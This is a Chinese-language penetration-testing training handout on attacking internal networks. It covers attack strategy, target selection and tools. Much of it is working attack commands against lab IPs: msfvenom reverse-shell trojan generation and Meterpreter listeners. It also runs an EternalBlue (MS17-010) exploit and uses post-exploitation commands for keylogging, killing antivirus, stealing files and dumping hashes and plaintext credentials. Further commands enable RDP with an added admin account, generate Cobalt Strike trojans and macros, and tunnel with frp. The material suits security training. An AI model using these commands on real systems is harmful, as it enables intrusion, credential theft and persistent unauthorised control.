day4-内网渗透基础一(下午)

原创培训课件
, ,

day4-内网渗透基础一(下午)

内网渗透常用攻击思路

1、攻击思路

攻击思路主要有2种:

1.攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式。

2.攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。

一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。第二种思路,社工的比重更大一些

2、敏感信息

需要注意的有:

高管/系统管理员/财务/人事/业务人员的个人电脑

文件服务器/共享服务器

邮件服务器

OA服务器

数据库服务器

3、攻击过程

按照第一种思路,可以分为4个阶段:

信息收集

漏洞验证/漏洞攻击

后渗透

日志清理

内网渗透常用工具

渗透测试平台类:Metasploit、Cobalt Strike、Empire

隧道转发类:frp、nps、CS-socks4、msf-socks4 netsh、ew、dnscat2、

工具:mimikatz、wmiexec、psexec、smbexec

等等

工具的使用详情以及演示

Metasploit

Metasploit 简介

Metasploit 是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括 Metasploit 框架及其商业对手,如 Metasploit Pro。

Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具

官网: https://www.metasploit.com/

模块

模块组织按照不同的用途分为6种类型的模块(Modules):

分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)、攻击载荷模块(payloads)、编码器模块(Encoders)、空指令模块(Nops)。payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。

工作目录

/usr/share/metasploit-framework

专业术语

1
2
3
4
5
– Exploit,攻击工具/代码
– Payload,攻击载荷
– Shellcode shell 代码
– Module,模块
– Listener,监听器

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
常用命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
show options – 查看该模块所有可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 进入使用某渗透攻击模块
back – 回退 set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用
Cd 更改当前的工作目录

生成可执行文件

1
2
3
4
5
6
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f exe > shell.exe

监听

1
2
3
4
5
6
7
8
9
10
11
12
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false 让connection保持连接(即使一个连接退出,仍然保持listening状态)
exploit -j –z -j(作为job开始运行)和-z(不立即进行session交换--也即是自动后台运行)

也可以在启动的时候监听
msfconsole -x use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 127.0.0.1; 
set lport 1234; 
exploit -j

实战演示

反向连接木马
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//生成生成木马32位
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.133 lport=8898 -f exe >/root/jiaoxue/dianxin/garck.exe  
//开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.88.133
set lport 8898
run

//生成生成木马64位
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.133 lport=8897 -f exe >/root/jiaoxue/dianxin/garck641.exe
//生成生成木马64位
msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.88.133 lport=8897 -f exe >/root/jiaoxue/dianxin/garck64.exe
//开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.88.133
set lport 8897
run

注意:监听的时候payload要和我们所生成的时候使用的payload一致
1
getuid  查看当前用户权限

image

 ps 查看进程

image

sessions 查看全部的会话

image

sessions 11

image

migrate pid //进程迁移

image

sysinfo 系统平台信息

image

ipconfig

image

screenshot 屏幕截取

image

run killav 关闭杀毒软件

image

run autoroute -s 10.10.10.0/24

image

run autoroute -p 查看自动路由表

image

1
2
3
4
5
6
7
meterpreter > cd 切换目录
meterpreter > rm 删除文件
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe 上传文件
meterpreter > search -d c: -f *.doc 搜索文件
meterpreter > execute -f cmd.exe -i 执行程序/命令
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
1
2
3
4
创建代理通道:
use auxiliary/server/socks_proxy
show options
run

image

image

shell //进入cmd的shell

chcp 65001 //显示utf8编码的中文字符

image

永恒之蓝

扫描是否存在永恒之蓝

1
2
3
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.88.10
run

image

攻击阶段

1
2
3
4
5
6
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.88.10
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.88.133
set lport 4455
run

image

获取hash和明文

1
2
3
获取hash
hashdump

1
2
3
4
5
6
7
8
9
10
11
获取明文
在最新的版本中load mimikatz已经取消 现在使用kiwi模块
load kiwi
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码


run getgui -e 开启远程终端 run post/windows/manage/enable_rdp

run getgui -u px -p QWEasd123

image

但是添加到Administrators组中失败了

在cmd手动将px用户添加到管理员用户组。

Text
1
net localgroup administrators px /add

image

Cobalt Strike

介绍

Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用 Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多 个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息 和sessions,可模拟APT做模拟对抗,进行内网渗透。

启动

./teamserver 192.168.8.133 12345 # 设置强密码,否则容易被爆破 12345是密码

端口默认的是50050 我这里已经改成了9986

界面

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1.新建连接
2.断开当前连接
3.监听器
4.改变视图为Pivot Graph(视图列表)
5.改变视图为Session Table(会话列表)
6.改变视图为Target Table(目标列表)
7.显示所有以获取的受害主机的凭证
8.查看已下载文件
9.查看键盘记录结果
10.查看屏幕截图
11.生成无状态的可执行exe木马
12.使用java自签名的程序进行钓鱼攻击
13.生成office宏病毒文件
14.为payload提供web服务以便下载和执行
15.提供文件下载,可以选择Mime类型
16.管理Cobalt Strike上运行的web服务
17.帮助
18.关于

支持的协议

1
2
3
4
5
6
7
8
Beacon DNS
Beacon HTTP
Beacon HTTPS
Beacon SMB
Beacon TCP
External C2
Foreign HTTP
Foreign HTTPS

建立一个监听

image

生成木马

image

image

上线

image

1
2
3
4
5
1.设置时间间隔
2.浏览文件
3.vnc用户交互
4.进程列表
5.

frp

frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。

1、利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。

2、对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。

3、利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。

e Analytics -->